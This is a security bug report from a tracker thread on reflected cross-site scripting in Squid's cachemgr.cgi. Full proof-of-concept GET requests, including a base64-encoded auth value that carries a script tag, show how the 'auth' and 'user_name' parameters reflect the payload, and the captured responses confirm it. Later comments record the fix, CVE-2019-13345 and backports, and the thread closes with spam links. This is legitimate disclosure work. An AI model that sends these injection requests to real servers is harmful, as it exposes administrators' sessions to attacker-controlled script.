Created attachment 3715 [details] Screenshots of the XSS issues The "cachemgr.cgi" web module of the squid proxy is vulnerable to XSS issue. The vulnerable parameters "user_name" and "auth" have insufficient sanitization in place. The method(rfc_1738_unescape()) defined in source code /lib/rec1738.c was not enforced to all HTTP response params per request type defined in the cachemgr.cc source code. For instance; on line 1092 of the source file /squid/tools/cachemgr.cc , the decode_pub_auth() method does not enforce any sanitization for the parameters which are parsed by strok() which causes the first XSS vulnerability. The first XSS vulnerability found on the "auth" parameter can be triggered by submitting the following GET request: HTTP Request: GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=admin&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE= HTTP/1.1 Host: 10.211.55.3 [SNIPPED] HTTP Response: HTTP/1.1 200 OK Date: Mon, 27 May 2019 12:18:58 GMT Server: Apache/2.4.25 (Debian) [SNIPPED] <TR><TH ALIGN="left">Cache Host:</TH><TD><INPUT NAME="host" size="30" VALUE="localhost"></TD></TR> <TR><TH ALIGN="left">Cache Port:</TH><TD><INPUT NAME="port" size="30" VALUE="3128"></TD></TR> <TR><TH ALIGN="left">Manager name:</TH><TD><INPUT NAME="user_name" size="30" VALUE="adm"><script>alert('XSS')</script>in"></TD></TR> [SNIPPED] The payload within the base64 encoded( bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE= ) auth value is: localhost|1558956372|adm"><script>alert('XSS')</script>in|dsdadaa The other second vulnerable parameter "username" can be exploited by submitting the following HTTP GET request: HTTP Request: GET /cgi-bin/cachemgr.cgi?server=&host=localhost&port=3128&user_name=ad"><script>alert('XSS')</script>min&passwd= HTTP/1.1 Host: 10.211.55.3 [SNIPPED] HTTP Response: HTTP/1.1 200 200 OK [SNIPPED] <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd%22%3E <HTML><HEAD><TITLE>CacheMgr@localhost: menu</TITLE> <STYLE type="text/css"><!--BODY{background-color:#ffffff;font-family:verdana,sans-serif}TABLE{background-color:#333333;border:0pt;padding:0pt}TH,TD{background-color:#ffffff;white-space:nowrap}--></STYLE> </HEAD><BODY> <H2><a href="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager</a> menu for localhost:</H2><UL> <UL> <LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=index&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Interface</A> <LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=menu&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Menu</A> <LI type="circle">Toggle offline_mode setting (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=offline_toggle&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A> <LI type="circle">Shut Down the Squid Process (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=shutdown&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A> [SNIPPED] Please check the screenshot for the proofs.
https://github.com/squid-cache/squid/pull/429 has been opened to resolve the issue of insufficient normalization and escaping of the HTML outputs.
PR has been applied to Squid-5. It also appears CVE-2019-13345 has been assigned for this issue.
Applied to squid-3.5 as well
very good post. http://www.winmilliongame.com http://www.gtagame100.com http://www.subway-game.com http://www.zumagame100.com
Nice!! issue resolved https://attestationuae.com